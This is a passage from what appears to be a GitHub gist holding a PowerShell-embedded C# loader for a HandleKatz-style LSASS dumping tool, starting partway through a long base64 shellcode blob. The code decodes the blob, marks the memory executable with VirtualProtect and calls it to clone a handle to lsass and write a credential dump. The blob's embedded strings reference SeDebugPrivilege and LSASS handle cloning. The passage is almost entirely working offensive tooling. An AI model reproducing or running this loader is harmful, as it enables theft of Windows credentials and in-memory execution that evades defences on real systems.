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";
byte[] buf1 = Convert.FromBase64String(base64Katz);
uint num;
IntPtr pointer = Marshal.AllocHGlobal(buf1.Length);
Marshal.Copy(buf1, 0, pointer, buf1.Length);
VirtualProtect(pointer, new UIntPtr((uint)buf1.Length), (uint)0x40, out num);
var func = (HandleDelegate)Marshal.GetDelegateForFunctionPointer(pointer, typeof(HandleDelegate));
IntPtr StringPointer = Marshal.AllocHGlobal(0x100);
byte[] ByteArray = Encoding.ASCII.GetBytes(path);
Marshal.Copy(ByteArray, 0, StringPointer, ByteArray.Length);
StringBuilder output = new StringBuilder(512);
uint result = func(recon, StringPointer, pID, output);
//Console.WriteLine(result);
Console.WriteLine(output);
}
}
}
"@
Add-Type -TypeDefinition $HandleKatzInject -Language CSharp
[HandleKatzInject.Program]::Inject($recon, $DumpPath, $handlePid)
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment